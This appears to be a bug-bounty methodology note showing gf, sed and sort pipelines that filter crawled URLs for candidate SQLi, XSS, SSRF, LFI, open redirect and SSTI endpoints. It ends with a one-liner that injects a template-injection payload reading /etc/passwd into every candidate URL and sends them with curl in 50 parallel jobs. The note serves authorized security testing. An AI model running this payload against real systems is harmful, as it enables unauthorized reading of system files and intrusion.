We will use gf to automate testing for:

  • SQLi
  • XSS
  • SSRF
  • LFI
  • Open Redirect
  • SSTI

There are many types in gf that we can use:

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cat all_urls.txt | ~/go/bin/gf sqli | sudo tee mass_sqli/gf_sqli.txt | ~/go/bin/gf sqli | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | sort | uniq | sudo tee mass_sqli/gf_sqli_uniq.txt

Use gf to filter for potential SQLi vulnerable endpoints:

cat all_urls.txt | ~/go/bin/gf sqli | sudo tee mass_sqli/gf_sqli.txt

Filter only for unique ones:

cat gf_sqli.txt | ~/go/bin/gf sqli | sed 's/=.*/=/' | sed 's/URL: //' | sort | uniq | sudo tee gf_sqli_uniq.txt

After filtering for unique ones, we nearly got it down to 1/3.

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cat all_urls.txt | ~/go/bin/gf xss | sudo tee mass_xss/gf_xss.txt | ~/go/bin/gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | sort | uniq | sudo tee mass_xss/gf_xss_uniq.txt

knoxss on browser

gf will automatically filter for URLs that matched typical XSS format:

cat all_urls.txt| ~/go/bin/gf xss | sudo tee mass_xss/gf_xss.txt

There are 24006 potential endpoints:

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However, right now there are lot of overlaps in parameters:

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Let’s filter out only unique ones.

cat gf_xss.txt | ~/go/bin/gf xss | sed 's/=.*/=/' | sed 's/URL: //' | sort | uniq | sudo tee gf_xss_uniq.txt

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cat all_urls.txt | ~/go/bin/gf ssrf | sudo tee mass_ssrf/gf_ssrf.txt | ~/go/bin/gf ssrf | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | sort | uniq | sudo tee mass_ssrf/gf_ssrf_uniq.txt

Filter for SSRF patterns:

cat all_urls.txt | ~/go/bin/gf ssrf | sudo tee mass_ssrf/gf_ssrf.txt

Filter for unique ones:

cat mass_ssrf/gf_ssrf.txt | ~/go/bin/gf ssrf | sed 's/=.*/=/' | sed 's/URL: //' | sort | uniq | sudo tee mass_ssrf/gf_ssrf_uniq.txt

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cat all_urls.txt | ~/go/bin/gf lfi | sudo tee mass_lfi/gf_lfi.txt | ~/go/bin/gf lfi | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | sort | uniq | sudo tee mass_lfi/gf_lfi_uniq.txt

Filter for lfi patterns:

cat all_urls.txt | ~/go/bin/gf lfi | sudo tee mass_lfi/gf_lfi.txt

Filter for unique endpoints:

cat gf_lfi.txt | ~/go/bin/gf lfi | sed 's/=.*/=/' | sed 's/URL: //' | sort | uniq | sudo tee gf_lfi_uniq.txt

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cat all_urls.txt | ~/go/bin/gf redirect | sudo tee mass_redirect/gf_redirect.txt | ~/go/bin/gf redirect | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | sort | uniq | sudo tee mass_redirect/gf_redirect_uniq.txt

cat 2katana_httprobe.txt | ~/go/bin/gf redirect | sudo tee mass_redirect/gf_redirect.txt
cat mass_redirect/gf_redirect.txt | ~/go/bin/gf redirect | sed 's/=.*/=/' | sed 's/URL: //' | sort | uniq | sudo tee mass_redirect/gf_redirect_uniq.txt

![alt text](https://raw.githubusercontent.com/jadu101/jadu101.github.io/v4/Images/bbh/methodology/Screenshot%20from%202024-11-10 11-54-43.png)


cat gf_ssti_uniq.txt  | ~/go/bin/qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep  "root:x"